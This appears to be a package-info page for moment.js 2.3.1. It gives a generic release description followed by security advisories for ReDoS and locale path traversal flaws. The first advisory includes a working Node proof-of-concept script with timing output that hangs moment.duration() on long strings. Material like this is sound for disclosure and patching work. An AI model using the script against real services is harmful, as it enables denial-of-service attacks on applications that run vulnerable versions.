Moment.js, a widely used JavaScript library for parsing, manipulating, and displaying dates and times, saw a minor version bump from 2.3.0 to 2.3.1 in October 2013. While both versions share the same core functionality and development dependencies, the key difference lies in their release dates and potentially included bug fixes or minor enhancements. Developers familiar with version 2.3.0 will find version 2.3.1 immediately accessible, as the API surface and core features remain consistent.
Both versions offer a comprehensive suite of date manipulation tools, letting developers perform operations like adding or subtracting days, months, or years, formatting dates into various display formats, and calculating time differences. The devDependencies section reveals the tooling used in moment's development process, involving Grunt for task automation (including minification with UglifyJS, code quality checks with JSHint, and unit testing with Nodeunit). The repository URL points to the official GitHub repository, where developers can find extensive documentation, contribute to the project, and report issues. This update, though seemingly small, ensures developers are leveraging the most up-to-date stable release available at the time, benefiting from potential bug fixes and minor improvements that might have been introduced since version 2.3.0. The releaseDate field also provides a precise timestamp for each version, useful for tracking software releases and updates.
All the vulnerabilities related to the version 2.3.1 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
var moment = require('moment');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=20000;i<=10000000;i=i+10000) {
console.log("COUNT: " + i);
var str = '-' + genstr(i, '1')
console.log("LENGTH: " + str.length);
var start = process.hrtime();
moment.duration(str)
var end = process.hrtime(start);
console.log(end);
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if user provided locale string, eg fr is directly used to switch moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
Are there any links users can visit to find out more?
If you have any questions or comments about this advisory: